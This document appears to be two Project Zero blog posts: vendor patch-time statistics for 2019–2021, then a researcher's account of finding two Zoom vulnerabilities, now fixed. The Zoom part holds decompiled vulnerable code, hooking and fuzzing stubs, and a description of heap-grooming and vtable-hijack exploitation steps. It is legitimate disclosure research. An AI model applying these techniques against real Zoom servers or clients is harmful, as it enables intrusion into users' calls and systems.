For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their fix deadline; the remaining 3 are still within theirs. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if they confirm they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor     | Total bugs | Fixed by day 90 | Fixed during grace period | Exceeded deadline & grace period | Avg days to fix
Apple      | 84         | 73 (87%)        | 7 (8%)                    | 4 (5%)                           | 69
Microsoft  | 80         | 61 (76%)        | 15 (19%)                  | 4 (5%)                           | 83
Google     | 56         | 53 (95%)        | 2 (4%)                    | 1 (2%)                           | 44
Linux      | 25         | 24 (96%)        | 0 (0%)                    | 1 (4%)                           | 25
Adobe      | 19         | 15 (79%)        | 4 (21%)                   | 0 (0%)                           | 65
Mozilla    | 10         | 9 (90%)         | 1 (10%)                   | 0 (0%)                           | 46
Samsung    | 10         | 8 (80%)         | 2 (20%)                   | 0 (0%)                           | 72
Oracle     | 7          | 3 (43%)         | 0 (0%)                    | 4 (57%)                          | 109
Others*    | 55         | 48 (87%)        | 3 (5%)                    | 4 (7%)                           | 44
TOTAL      | 346        | 294 (84%)       | 34 (10%)                  | 18 (5%)                          | 61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

The average number of days to fix bugs across all vendors is 61. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor     | Bugs in 2019 (avg days to fix) | Bugs in 2020 (avg days to fix) | Bugs in 2021 (avg days to fix)
Apple      | 61 (71)                        | 13 (63)                        | 11 (64)
Microsoft  | 46 (85)                        | 18 (87)                        | 16 (76)
Google     | 26 (49)                        | 13 (22)                        | 17 (53)
Linux      | 12 (32)                        | 8 (22)                         | 5 (15)
Others*    | 54 (63)                        | 35 (54)                        | 14 (29)
TOTAL      | 199 (67)                       | 87 (54)                        | 63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the others not represented in the table have collectively cut their time to fix by more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period was used 9 times (notably with half being by Microsoft), versus the slightly higher average of 12.5 in the other years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor            | Total bugs | Avg fix time
iOS               | 76         | 70
Android (Samsung) | 10         | 72
Android (Pixel)   | 6          | 72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser | Bugs | Avg days from bug report to public patch | Avg days from public patch to release | Avg days from bug report to release
Chrome  | 40   | 5.3                                      | 24.6                                  | 29.9
WebKit  | 27   | 11.6                                     | 61.1                                  | 72.7
Firefox | 8    | 16.6                                     | 21.1                                  | 37.8
Total   | 75   | 8.8                                      | 37.3                                  | 46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to the "Avg days from public patch to release" column):

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, taking an average of 30 days from bug report to a fix being released in the stable channel. The time to patch is very fast here, with an average of just 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public makes up the bulk of the overall window, though we still see the Chrome (blue) bars toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest average time from report to release, at 73 days. Their time to land the fix publicly sits between Chrome's and Firefox's, but unfortunately this leaves a very long window for opportunistic attackers to find the patch and exploit it before the fix is made available to users. This can be seen in the Apple (red) bars of the second histogram mostly sitting on the right side of the graph, with all but one being past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patching, effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

Zooming in on Zero-click Exploits

By: Ryan
18 January 2022 at 17:28

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.
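
The hook itself is simple. As a rough stand-in (my own sketch, not the original Frida script; it assumes SSL_write is dynamically resolved, which may not hold for the real client, where the function had to be located via log strings), an LD_PRELOAD interposer achieves the same plaintext dump:

// Stand-in sketch: an LD_PRELOAD interposer that dumps the plaintext
// passed to SSL_write (i.e. the XMPP stanzas) before encryption.
// Build: g++ -shared -fPIC -o sslhook.so sslhook.cc -ldl
#include <dlfcn.h>
#include <cstdio>

extern "C" int SSL_write(void *ssl, const void *buf, int num) {
    using real_t = int (*)(void *, const void *, int);
    static real_t real =
        reinterpret_cast<real_t>(dlsym(RTLD_NEXT, "SSL_write"));
    if (num > 0)
        fwrite(buf, 1, static_cast<size_t>(num), stderr);  // log plaintext
    return real(ssl, buf, num);
}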

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.
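
To make the gloox pattern concrete, here is a hedged sketch with made-up names (ExampleExtension, ExampleHandler, and the filter string are illustrative; Zoom's actual classes are only known from the decompiled code):

// Sketch of the gloox extension pattern described above.
#include <gloox/stanzaextension.h>
#include <gloox/messagehandler.h>
#include <gloox/message.h>
#include <gloox/tag.h>

using namespace gloox;

// Application-defined tag: tells gloox how to turn matching XML into an object.
class ExampleExtension : public StanzaExtension {
 public:
  static const int ExtExample = ExtUser + 1;
  explicit ExampleExtension(const Tag *tag = 0) : StanzaExtension(ExtExample) {
    // ... extract fields from the tag ...
  }
  StanzaExtension *newInstance(const Tag *tag) const override {
    return new ExampleExtension(tag);  // invoked by the XMPP parser
  }
  const std::string &filterString() const override {
    static const std::string f = "/message/example";  // which tags we claim
    return f;
  }
  StanzaExtension *clone() const override { return new ExampleExtension(*this); }
  Tag *tag() const override { return 0; }  // serialization omitted in this sketch
};

// Application logic: receives fully parsed stanzas.
class ExampleHandler : public MessageHandler {
  void handleMessage(const Message &msg, MessageSession *) override {
    if (msg.findExtension<ExampleExtension>(ExampleExtension::ExtExample)) {
      // ... perform feature-specific processing, analogous to what Zoom
      // does in CXmppIMSession::handleMessage ...
    }
  }
};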

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different than the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn’t load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don’t have source code available. Instead, I compiled my own fuzzing stub that called the function I wanted to fuzz as a relocatable that defined fopen, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time that the MMR binary called fopen, and was able to call the function being fuzzed.
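
A minimal sketch of that stub might look like this (the target address and signature are hypothetical placeholders for values recovered from the disassembly):

// Hypothetical LD_PRELOAD fuzzing stub. Because the MMR binary is not
// relocatable, the function under test sits at a known fixed address,
// so the stub can call it directly once it steals control in fopen().
#include <cstdio>
#include <cstdlib>
#include <cstdint>
#include <dlfcn.h>

constexpr uintptr_t kTargetAddr = 0x5a3bd0;  // made-up address from the disassembly
using target_fn = int (*)(const uint8_t *data, size_t len);

extern "C" FILE *fopen(const char *path, const char *mode) {
    static bool hijacked = false;
    if (!hijacked) {
        hijacked = true;
        uint8_t buf[0x1000];
        size_t n = fread(buf, 1, sizeof(buf), stdin);  // one fuzz input
        reinterpret_cast<target_fn>(kTargetAddr)(buf, n);
        exit(0);
    }
    using real_t = FILE *(*)(const char *, const char *);
    static real_t real = reinterpret_cast<real_t>(dlsym(RTLD_NEXT, "fopen"));
    return real(path, mode);
}

Compiled with g++ -shared -fPIC and run as LD_PRELOAD=./stub.so ./mmr < input, the stub takes over on the first fopen() call and feeds one input to the target function.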

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great deal of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great deal of classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t,  which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(

msg_db, &this->str_len, consume_bytes, error_out);

  str_len = this->str_len;

  if ( str_len )

  {

    mem = operator new[](str_len);

    out_len = 0;

    this->str_mem = mem;

    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db_t* msg, signed __int8 *mem,

unsigned int *len)

{

  if ( !msg->invalid )

  {

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);

    if ( !msg->invalid )

    {

      if ( *len )

        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read(msg, mem, *len, 0);

    }

  }

  return msg;

}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).
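
Boiled down, the problem is that the two lengths are never cross-checked. A minimal sketch of the flawed pattern (my paraphrase of the decompiled logic; the Stream type is a hypothetical stand-in for the msg_db_t reader):

#include <cstdint>
#include <cstring>

// Minimal stand-in for the msg_db_t reader (hypothetical interface).
struct Stream {
    const uint8_t *p;
    uint32_t read_u32() { uint32_t v; memcpy(&v, p, 4); p += 4; return v; }
    void read(void *dst, uint32_t n) { memcpy(dst, p, n); p += n; }
};

char *load_string(Stream &s) {
    uint32_t str_len = s.read_u32();   // length #1: sizes the allocation
    char *mem = new char[str_len];
    uint32_t out_len = s.read_u32();   // length #2: sizes the copy
    // Missing check: if (out_len > str_len) reject the packet.
    s.read(mem, out_len);              // out_len > str_len ==> heap overflow
    return mem;
}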

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the class the vulnerability occurs in, was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

struct variant{

char type;

short length;

var_data data;

};

union var_data{

        char i8;

        char* i8_ptr;

        short i16;

        short* i16_ptr;

        int i32;

        int* i32_ptr;

        long long i64;

        long long* i64_ptr;

};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 for 64-bit). The length field specifies whether the variant is an array and, if so, its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer, and an array of that size is read.
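
Continuing the structures above, the decoding presumably looks something like this (a reconstruction from the description, not Zoom's actual code):

#include <cstdint>

// Reconstructed sketch of variant decoding. length == 0 means the value
// is stored inline; any other length means data is treated as a pointer
// to an array of `length` elements of the given width.
uint64_t variant_scalar(const variant &v) {
    switch (v.type) {
        case 1: return (uint8_t)v.data.i8;    // 8-bit
        case 2: return (uint16_t)v.data.i16;  // 16-bit
        case 3: return (uint32_t)v.data.i32;  // 32-bit
        case 4: return (uint64_t)v.data.i64;  // 64-bit
        default: return 0;
    }
}

const void *variant_array(const variant &v) {
    // Only valid when v.length != 0; treating v.data as a pointer when the
    // sender stored a scalar (or vice versa) is exactly the type-confusion
    // risk discussed below.
    return (const void *)v.data.i8_ptr;
}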

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings, however not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.


I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can trigger both allocation and freeing. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique users accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).
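
As a rough stand-in for those scripts (the research used Frida; this glibc-specific interposer is my own sketch), logging allocation sizes per thread is enough to see which packets allocate where:

// Rough glibc-specific allocation logger. The MMR processes different
// traffic in different threads (and thus different heap arenas), so
// tagging each allocation with its thread id shows which packet types
// allocate where.
#include <cstdio>
#include <cstddef>
#include <unistd.h>
#include <sys/syscall.h>

extern "C" void *__libc_malloc(size_t size);  // glibc's real allocator

extern "C" void *malloc(size_t size) {
    void *p = __libc_malloc(size);
    char line[96];
    int n = snprintf(line, sizeof(line), "[tid %ld] malloc(%zu) = %p\n",
                     (long)syscall(SYS_gettid), size, p);
    write(2, line, n);  // raw write() avoids re-entering malloc
    return p;
}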

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met these criteria, and since CVE-2021-34423 allows the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location, were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes; however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

